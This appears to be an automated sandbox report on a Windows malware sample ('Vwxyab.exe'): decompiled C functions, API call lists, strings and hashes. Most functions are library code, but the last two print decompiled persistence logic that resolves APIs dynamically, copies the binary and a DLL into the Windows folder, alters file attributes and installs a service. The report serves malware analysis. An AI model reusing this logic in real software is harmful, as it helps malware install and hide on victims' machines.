Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: |%D
API String ID: 4063778783-1005067592
Opcode ID: bf1066f8db12241f27cad259936fa25d9ecddff94d56ee684695c7070681de6c
Instruction ID: 84181ef0f3c98cd7a0dbecb84b7eb87c665b1fae3cee699c0b175a9b1c58c635
Opcode Fuzzy Hash: bf1066f8db12241f27cad259936fa25d9ecddff94d56ee684695c7070681de6c
Instruction Fuzzy Hash: 9BE0A0F19143006AD308EE61EA05A1F72946B90714F504A2FB95A401C0EB78DA18C55B

Uniqueness

Uniqueness Score: -1.00%

Function 00412375, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00412375(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t15;
				void* _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t29;

				_t29 = __eflags;
				_t25 = __edi;
				_t21 = __ebx;
				 *__ecx = 0x43e454;
				 *((intOrPtr*)(__ecx + 4)) = 0x43e43c;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x43e424;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xc0000001;
				E00412294(__eax + __eax, __ecx);
				_t15 = InterlockedDecrement(E0040E67F(__ebx, __edi, __esi, _t29) + 0x2c);
				_t30 = _t15;
				if(_t15 != 0) {
					return _t15;
				} else {
					_t16 = E0040E67F(__ebx, __edi, __esi, _t30);
					_t31 =  *((intOrPtr*)(_t16 + 0x30));
					if( *((intOrPtr*)(_t16 + 0x30)) == 0) {
						_push(__esi);
						E004172D3(1);
						_t27 =  *((intOrPtr*)(E0040E67F(__ebx, __edi, __esi, _t31) + 4));
						if(_t27 == 0) {
							L7:
							_t19 = E0040E67F(_t21, _t25, _t27, _t34);
							if( *((char*)(_t19 + 0x14)) == 0) {
								_push(0);
								E0040A85C();
							}
							L9:
							return _t19;
						}
						_t23 =  *((intOrPtr*)(_t27 + 0x20));
						if( *((intOrPtr*)(_t27 + 0x20)) == 0) {
							goto L7;
						}
						_t19 = E00415A74(_t23);
						_t34 = _t19;
						if(_t19 == 0) {
							goto L9;
						}
						_pop(_t27);
						goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x20)))) + 0x60)));
					}
					return _t16;
				}
			}

0x00412375
0x00412375
0x00412375
0x00412375
0x0041237b
0x00412382
0x00412389
0x00412390
0x00417340
0x00417346
0x00417348
0x0041734f
0x0041734a
0x004172eb
0x004172f0
0x004172f4
0x004172f6
0x004172f9
0x00417303
0x00417308
0x00417323
0x00417323
0x0041732c
0x0041732e
0x00417330
0x00417330
0x00417335
0x00000000
0x00417335
0x0041730a
0x0041730f
0x00000000
0x00000000
0x00417311
0x00417316
0x00417318
0x00000000
0x00000000
0x0041731f
0x00417320
0x00417320
0x00417336
0x00417336

APIs

InterlockedDecrement.KERNEL32(-0000002C), ref: 00417340

Part of subcall function 00415A74: IsWindowEnabled.USER32(?), ref: 00415A7D

Strings

<C, xrefs: 0041237B
$C, xrefs: 00412382

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: DecrementEnabledInterlockedWindow
String ID: $C$<C
API String ID: 274451516-850035360
Opcode ID: a0d94b76c2d1f4a01be27591ce7af6b42832f873ebca6b851fdeca541fe66ec3
Instruction ID: 164d0060cba68d6e93367d34be95611aa99bf9100a4ba4629f16b0e317ed376d
Opcode Fuzzy Hash: a0d94b76c2d1f4a01be27591ce7af6b42832f873ebca6b851fdeca541fe66ec3
Instruction Fuzzy Hash: 57F0AF30609204CFDB20AF22D504B9A3770BF28308B54559FAC555F283CB7AC882DA9E

Uniqueness

Uniqueness Score: -1.00%

Function 00439296, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00439296(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t23;
				void* _t25;
				void* _t26;

				_push(0x44);
				E004271DA(E0043B787, __ebx, __edi, __esi);
				E00404BA0(_t25 - 0x28, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				E00402380( *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x4425a0;
				E00429326(_t25 - 0x50, 0x44ad30);
				asm("int3");
				_push(__esi);
				_t23 = _t25 - 0x50;
				E00404B20( *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x4425a0;
				return _t23;
			}

0x00439296
0x0043929d
0x004392aa
0x004392af
0x004392af
0x004392ba
0x004392c8
0x004392cf
0x004392d4
0x004392d5
0x004392da
0x004392dc
0x004392e1
0x004392ea

APIs

__EH_prolog3.LIBCMT ref: 0043929D
__CxxThrowException@8.LIBCMT ref: 004392CF

Part of subcall function 00429326: RaiseException.KERNEL32(0040E68E,0040D295,00401099,00000000,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00429366

Part of subcall function 00404B20: std::exception::exception.LIBCMT ref: 00404B4E

Strings

invalid string position, xrefs: 004392A2

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
String ID: invalid string position
API String ID: 2977319401-1799206989
Opcode ID: a0dead978ffa22cc3ec2f08a1646e5ce2a0f171a1519555e087de7d4516feaca
Instruction ID: 9b7cf93e3289814e30c34a05105a03ca4e7ee4b0338e8657069acaa4db1b400a
Opcode Fuzzy Hash: a0dead978ffa22cc3ec2f08a1646e5ce2a0f171a1519555e087de7d4516feaca
Instruction Fuzzy Hash: EDE0A0B1910224ABD704EBD1D912BCEB774AF04315F80442FF600A61C0DBBC9904C76C

Uniqueness

Uniqueness Score: -1.00%

Function 0043234C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043234C(char _a4, char _a5, char _a6, char _a7) {
				char _t7;
				int _t10;

				_t7 = _a4;
				if(_t7 != 0) {
					_a4 = _t7 + 0x40;
					_a5 = 0x3a;
					_a6 = 0x5c;
					_a7 = 0;
					_t10 = GetDriveTypeA( &_a4);
					if(_t10 == 0 || _t10 == 1) {
						return 0;
					} else {
						goto L1;
					}
				} else {
					L1:
					return 1;
				}
			}

0x0043234f
0x00432354
0x0043235d
0x00432364
0x00432368
0x0043236c
0x00432370
0x00432378
0x00432382
0x00000000
0x00000000
0x00000000
0x00432356
0x00432356
0x0043235a
0x0043235a

APIs

GetDriveTypeA.KERNEL32(?,?,00432398,?,00000000,00000007,00000007,?,004324DD,00000000,?,?,0044AB80,0000000C,00429BC7,?), ref: 00432370

Strings

\, xrefs: 00432368
:, xrefs: 00432364

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: DriveType
String ID: :$\
API String ID: 338552980-1166558509
Opcode ID: f8e6be13d6ba430bb602b8a03233094e85b1ca8a1b42d3b51957b1443deddea4
Instruction ID: f03fe9a4c226c62422eb4ac5c849c9a89233c8494341cf437215e01ab4b653f9
Opcode Fuzzy Hash: f8e6be13d6ba430bb602b8a03233094e85b1ca8a1b42d3b51957b1443deddea4
Instruction Fuzzy Hash: 9BE048302182C99EEF51CAB8944479B3FCC9B15688F04C056EC4CCE241D279D6568759

Uniqueness

Uniqueness Score: -1.00%

Function 0043401E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043401E(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;
				void* _t8;
				void* _t11;

				_t2 = _a4;
				if(_t2 < 0x450050 || _t2 > 0x4502b0) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E0042E21D(_t8, _t11, (_t2 - 0x450050 >> 5) + 0x10);
				}
			}

0x0043401e
0x00434029
0x00434042
0x00434046
0x0043404c
0x00434032
0x00434041
0x00434041

APIs

__lock.LIBCMT ref: 0043403B

Part of subcall function 0042E21D: __mtinitlocknum.LIBCMT ref: 0042E231
Part of subcall function 0042E21D: __amsg_exit.LIBCMT ref: 0042E23D
Part of subcall function 0042E21D: EnterCriticalSection.KERNEL32(?,?,?,00426365,00000004,0044A750,0000000C,0042AD44,?,?,00000000,00000000,00000000,0042A9E6,00000001,00000214), ref: 0042E245

EnterCriticalSection.KERNEL32(?,00438CD1,?,0044AC88,0000000C,00435B3F,?,0044AC20,00000010,00434011), ref: 00434046

Strings

7E, xrefs: 00434022

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
String ID: 7E
API String ID: 3996875869-1921024439
Opcode ID: 5ee011d4127c05a3920557b945f1eec68f0cc03963047ce96b5ba83e0b90b22d
Instruction ID: 45d79c944ec6ecba58149c0d1167831e74b6b92a05ff45d78256a86fbc25496b
Opcode Fuzzy Hash: 5ee011d4127c05a3920557b945f1eec68f0cc03963047ce96b5ba83e0b90b22d
Instruction Fuzzy Hash: BCD0237970010147DF1C55716D8960E2219D184343F745C9FF901C33C3C51DE840480D

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9B, Relevance: 5.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416D9B(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x4527c8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

0x00416d9d
0x00416da0
0x00416da0
0x00416da4
0x00416daa
0x00416db0
0x00416dd9
0x00416dda
0x00000000
0x00416de0
0x00416db2
0x00416db5
0x00000000
0x00000000
0x00416db9
0x00416dc1
0x00000000
0x00416dc8
0x00416dcf
0x00000000
0x00416dd5

APIs

EnterCriticalSection.KERNEL32(004527C8,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416DA4
TlsGetValue.KERNEL32(004527AC,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416DB9
LeaveCriticalSection.KERNEL32(004527C8,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416DCF
LeaveCriticalSection.KERNEL32(004527C8,?,?,?,00417272,?,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,765B253D), ref: 00416DDA

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: a56e631e3aa457ee629124fe4acb795626ab1bb145ef033a5e8c6a30349a66d0
Instruction ID: acb2667af657152517e0210f05c6bcde1b5850910fe74e2ab9ba8b304d2b49c3
Opcode Fuzzy Hash: a56e631e3aa457ee629124fe4acb795626ab1bb145ef033a5e8c6a30349a66d0
Instruction Fuzzy Hash: B5F0827A300210AFD720AF64FC8889773AAEF84371317992EE40297211D735F845CB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Vwxyab.exe PID: 1488 Parent PID: 568 Vwxyab.exeCOMMON

Executed Functions

Function 00403BC0, Relevance: 50.9, APIs: 9, Strings: 20, Instructions: 142
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00403BC0(void* __ebp) {
				signed int _v4;
				signed int _v36;
				char _v284;
				char _v304;
				char _v524;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v556;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				struct HINSTANCE__* _t40;
				_Unknown_base(*)()* _t41;
				void* _t43;
				unsigned int _t44;
				int _t49;
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t54;
				void* _t61;
				void* _t64;
				unsigned int _t65;
				void* _t69;
				void _t71;
				void _t72;
				signed int _t74;
				int _t77;
				char* _t79;
				void _t85;
				void _t86;
				signed int _t88;
				int _t91;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t108;
				void* _t110;
				signed int _t111;
				intOrPtr _t113;
				signed int _t114;

				_t38 =  *0x44f5d0; // 0x8e7de579
				_v4 = _t38 ^ _t111;
				_t110 = LoadLibraryA;
				_v544 = 0x5c;
				_v543 = 0x53;
				_v542 = 0x56;
				_v541 = 0x50;
				_v540 = 0x37;
				_v539 = 0x2e;
				_v538 = 0x50;
				_v537 = 0x4e;
				_v536 = 0x47;
				_v535 = 0;
				_t40 = LoadLibraryA("Shell32.dll");
				_t69 = GetProcAddress;
				_t41 = GetProcAddress(_t40, "SHGetSpecialFolderPathA");
				 *_t41(0,  &_v524, 0x2e, 0); // executed
				_t43 =  &_v560;
				_t108 = _t43;
				do {
					_t71 =  *_t43;
					_t43 = _t43 + 1;
				} while (_t71 != 0);
				_t44 = _t43 - _t108;
				_t98 =  &(( &_v540)[0xffffffffffffffff]);
				do {
					_t72 =  *(_t98 + 1);
					_t98 = _t98 + 1;
				} while (_t72 != 0);
				_t74 = _t44 >> 2;
				_t77 = memcpy(_t98, _t108, _t74 << 2) & 0x00000003;
				memcpy(_t108 + _t74 + _t74, _t108, _t77);
				_t113 = _t111 + 0x18;
				_t102 = _t108 + _t77 + _t77;
				GetProcAddress(LoadLibraryA("SHLWAPI.dll"), "PathFileExistsA");
				_t49 = PathFileExistsA( &_v540); // executed
				if(_t49 != 0) {
					E00403AE0( &_v540);
				}
				_t51 = GetProcAddress(LoadLibraryA("SHLWAPI.dll"), "PathRemoveFileSpecA");
				_t79 =  &_v540;
				 *_t51(_t79);
				_t54 = GetProcAddress(LoadLibraryA("KERNEL32.dll"), "GetModuleFileNameA");
				 *_t54(0,  &_v284, 0x104);
				_push(_t79);
				_t21 =  &_v564; // 0x47
				_v580 = _t113;
				_v564 = 0x53;
				_v563 = 0x56;
				_v562 = 0x50;
				_v561 = 0x37;
				_v560 = 0;
				E00401EE0(_t69, _t110, _t21);
				_push(_t113);
				_t96 =  &_v560;
				_v584 = _t113;
				E00401EE0(_t69, _t110,  &_v560);
				_push(_t113);
				_v588 = _t113;
				E00401EE0(_t69, _t110,  &_v304);
				_t61 = E004029C0( &_v560);
				_t114 = _t113 + 0xc;
				if(_t61 != 0) {
					_t64 =  &_v576;
					_t96 = _t64;
					do {
						_t85 =  *_t64;
						_t64 = _t64 + 1;
					} while (_t85 != 0);
					_t65 = _t64 - _t96;
					_t104 =  &_v556 + 0xffffffff;
					do {
						_t86 =  *(_t104 + 1);
						_t104 = _t104 + 1;
					} while (_t86 != 0);
					_t88 = _t65 >> 2;
					_t108 = _t96;
					_t91 = memcpy(_t104, _t108, _t88 << 2) & 0x00000003;
					memcpy(_t108 + _t88 + _t88, _t108, _t91);
					_t114 = _t114 + 0x18;
					_t102 = _t108 + _t91 + _t91;
					E00403AE0( &_v556);
				}
				return E0042569C(0, _t69, _v36 ^ _t114, _t96, _t102, _t108);
			}

APIs

LoadLibraryA.KERNEL32 ref: 00403C1A
GetProcAddress.KERNEL32(00000000), ref: 00403C23
LoadLibraryA.KERNEL32(SHLWAPI.dll,PathFileExistsA), ref: 00403C72
GetProcAddress.KERNEL32(00000000), ref: 00403C75
PathFileExistsA.KERNELBASE(?), ref: 00403C7C
LoadLibraryA.KERNEL32(SHLWAPI.dll,PathRemoveFileSpecA), ref: 00403C96
GetProcAddress.KERNEL32(00000000), ref: 00403C99
LoadLibraryA.KERNEL32(KERNEL32.dll,GetModuleFileNameA), ref: 00403CAC
GetProcAddress.KERNEL32(00000000), ref: 00403CAF

Strings

V, xrefs: 00403CD3
P, xrefs: 00403C06
PathFileExistsA, xrefs: 00403C63
S, xrefs: 00403CCE
7, xrefs: 00403CDD
V, xrefs: 00403BF2
GNP., xrefs: 00403CC3, 00403CCD
SHLWAPI.dll, xrefs: 00403C6B, 00403C91
7, xrefs: 00403BFC
GetModuleFileNameA, xrefs: 00403CA2
S, xrefs: 00403BED
PathRemoveFileSpecA, xrefs: 00403C8C
SHGetSpecialFolderPathA, xrefs: 00403BDE
., xrefs: 00403C01
Shell32.dll, xrefs: 00403BE3
P, xrefs: 00403CD8
KERNEL32.dll, xrefs: 00403CA7
N, xrefs: 00403C0B
P, xrefs: 00403BF7
\, xrefs: 00403BE8

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc$ExistsFilePath
String ID: .$7$7$GNP.$GetModuleFileNameA$KERNEL32.dll$N$P$P$P$PathFileExistsA$PathRemoveFileSpecA$S$S$SHGetSpecialFolderPathA$SHLWAPI.dll$Shell32.dll$V$V$\
API String ID: 3637693967-447970387
Opcode ID: 09f3807aaf29c328bcb1a62ecaabd20f36890bb811c052615ffb70d7f6c89350
Instruction ID: e515ebb8736f0e1bc8facc74ac7d5c84cfb588640560cab08e2dca4c86fde320
Opcode Fuzzy Hash: 09f3807aaf29c328bcb1a62ecaabd20f36890bb811c052615ffb70d7f6c89350
Instruction Fuzzy Hash: B841B3712083805BE310DB74DC55BAFBFD59F89348F440A1DF499672C1D6B9D608C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 1000B925, Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 139
filesleepstringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000B925() {
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _v24;
				struct _SERVICE_TABLE_ENTRY _v28;
				char _v288;
				void _v547;
				char _v548;
				char _v808;
				char _v1068;
				void* __edi;
				int _t30;
				signed int _t69;
				void* _t72;
				void* _t78;
				void* _t79;

				_v28 = 0x1002740c;
				_v24 = E10002D9B;
				_v20 = 0;
				_v16 = 0;
				_t30 = StartServiceCtrlDispatcherA( &_v28); // executed
				if(_t30 == 0) {
					_t69 = 0x40;
					_v548 = 0;
					memset( &_v547, _t30, _t69 << 2);
					asm("stosw");
					asm("stosb");
					ExpandEnvironmentStringsA(0x10027534,  &_v548, 0x104);
					strcpy(0x10027534,  &_v548);
					_pop(_t72);
					PathRemoveBackslashA(0x10027534);
					_v12 = 0x25;
					_v11 = 0x73;
					_v10 = 0x5c;
					_v9 = 0x25;
					_v8 = 0x73;
					_v7 = 0;
					sprintf( &_v288,  &_v12, 0x10027534, "Vwxyab.exe");
					E10002AEF( &_v288);
					CopyFileA("nw_elf.dll", "C:\\Windows\\nw_elf.dll", 0);
					GetModuleFileNameA(0,  &_v808, 0xe1);
					SetFileAttributesA( &_v808,  *0x10027406 & 0x0000ffff);
					CopyFileA( &_v808,  &_v288, 0);
					_t78 = E10002FC4("Vwxyab Defghijk", "Vwxyab Defghijk Mnopqrst Vwxy", "Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij",  &_v288, 0, 0, 2);
					if( *0x10027134 == 1) {
						E10001EE6(_t72,  &_v288);
					}
					if(_t78 != 0) {
						if( *0x100275a8 == 1) {
							_push(0);
							_t79 = E1000CCF9(0, 0, E10005745(0x104, 0x10027174), 0, 0, 0);
							WaitForSingleObject(_t79, 0xffffffff);
							CloseHandle(_t79);
						}
						if( *0x1002714c == 1) {
							E1000343E();
						}
						Sleep(0x1f4);
						return SetFileAttributesA( &_v288,  *0x10027406 & 0x0000ffff);
					} else {
						GetModuleFileNameA(0,  &_v1068, 0x104);
						SetFileAttributesA( &_v1068, 1);
						return E1000B254();
					}
				}
				return _t30;
			}

0x1000b937
0x1000b93e
0x1000b945
0x1000b948
0x1000b94b
0x1000b953
0x1000b961
0x1000b962
0x1000b968
0x1000b96a
0x1000b96c
0x1000b980
0x1000b98e
0x1000b994
0x1000b996
0x1000b9ac
0x1000b9b1
0x1000b9b5
0x1000b9b9
0x1000b9bd
0x1000b9c1
0x1000b9c4
0x1000b9d1
0x1000b9e4
0x1000b9f7
0x1000ba0c
0x1000ba21
0x1000ba50
0x1000ba52
0x1000ba5b
0x1000ba60
0x1000ba63
0x1000ba91
0x1000ba93
0x1000baac
0x1000bab1
0x1000bab8
0x1000bab8
0x1000bac5
0x1000bac7
0x1000bac7
0x1000bad1
0x00000000
0x1000ba65
0x1000ba6e
0x1000ba7d
0x00000000
0x1000ba83
0x1000ba63
0x1000baf0

APIs

StartServiceCtrlDispatcherA.ADVAPI32(?,00000001,00000000,Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij), ref: 1000B94B
ExpandEnvironmentStringsA.KERNEL32(%SystemRoot%\,?,00000104), ref: 1000B980
strcpy.MSVCRT(%SystemRoot%\,?), ref: 1000B98E
PathRemoveBackslashA.SHLWAPI(%SystemRoot%\), ref: 1000B996
sprintf.MSVCRT ref: 1000B9C4

Part of subcall function 10002AEF: strlen.MSVCRT ref: 10002B17
Part of subcall function 10002AEF: _access.MSVCRT ref: 10002B3F
Part of subcall function 10002AEF: CreateDirectoryA.KERNEL32(?,00000000), ref: 10002B56
Part of subcall function 10002AEF: strlen.MSVCRT ref: 10002B5E

CopyFileA.KERNEL32(nw_elf.dll,C:\Windows\nw_elf.dll,00000000), ref: 1000B9E4
GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 1000B9F7
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000BA0C
CopyFileA.KERNEL32(?,?,00000000), ref: 1000BA21

Part of subcall function 10002FC4: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000104,%SystemRoot%\,00000000), ref: 10002FFF
Part of subcall function 10002FC4: _local_unwind2.MSVCRT ref: 10003012

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000BA6E
SetFileAttributesA.KERNEL32(?,00000001), ref: 1000BA7D

Part of subcall function 10001EE6: OpenProcess.KERNEL32(00000040,00000000,00000004,00000104,00000000,?,?,1000BA60,?), ref: 10001EF8

WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,00000000), ref: 1000BAB1
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000BAB8
Sleep.KERNEL32(000001F4), ref: 1000BAD1
SetFileAttributesA.KERNEL32(?,00000000), ref: 1000BAE6

Part of subcall function 10005745: strlen.MSVCRT ref: 10005753
Part of subcall function 10005745: malloc.MSVCRT ref: 10005768
Part of subcall function 10005745: memcpy.MSVCRT ref: 10005776
Part of subcall function 10005745: strrchr.MSVCRT ref: 10005781
Part of subcall function 10005745: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000,00000104), ref: 100057B5
Part of subcall function 10005745: strcat.MSVCRT(?,\%s), ref: 100057C7
Part of subcall function 10005745: wsprintfA.USER32 ref: 100057DB
Part of subcall function 10005745: LoadLibraryA.KERNEL32(00000075,?), ref: 10005862
Part of subcall function 10005745: GetProcAddress.KERNEL32(00000000), ref: 10005869

Part of subcall function 1000CCF9: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000CD12
Part of subcall function 1000CCF9: _beginthreadex.MSVCRT ref: 1000CD30
Part of subcall function 1000CCF9: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000CD40
Part of subcall function 1000CCF9: FindCloseChangeNotification.KERNELBASE(?), ref: 1000CD49

Strings

\, xrefs: 1000B9B5
%, xrefs: 1000B9B9
C:\Windows\nw_elf.dll, xrefs: 1000B9DA
s, xrefs: 1000B9B1
s, xrefs: 1000B9BD
nw_elf.dll, xrefs: 1000B9DF
%, xrefs: 1000B9AC
Vwxyab Defghijk Mnopqrst Vwxy, xrefs: 1000BA37
%SystemRoot%\, xrefs: 1000B979, 1000B97F, 1000B98D, 1000B995, 1000B9A4
Vwxyab.exe, xrefs: 1000B99C
Vwxyab Defghijk, xrefs: 1000B937, 1000BA3C
Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij, xrefs: 1000B92E, 1000BA32

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Attributesstrlen$CloseCopyCreateModuleNameObjectOpenPathSingleWait$AddressBackslashChangeCtrlDirectoryDispatcherEnvironmentEventExpandFindFolderHandleLibraryLoadManagerNotificationProcProcessRemoveServiceSleepSpecialStartStrings_access_beginthreadex_local_unwind2mallocmemcpysprintfstrcatstrcpystrrchrwsprintf
String ID: %$%$%SystemRoot%\$C:\Windows\nw_elf.dll$Vwxyab Defghijk$Vwxyab Defghijk Mnopqrst Vwxy$Vwxyab.exe$Vwxyabcd Fghijklmn Pqrstuv Xyabcdef Hij$\$nw_elf.dll$s$s
API String ID: 3607564315-1233437424
Opcode ID: 995f21f2eb57822699499ff34c2db48fd8a7cdd818a8d2c741d24f58e6d7dac6
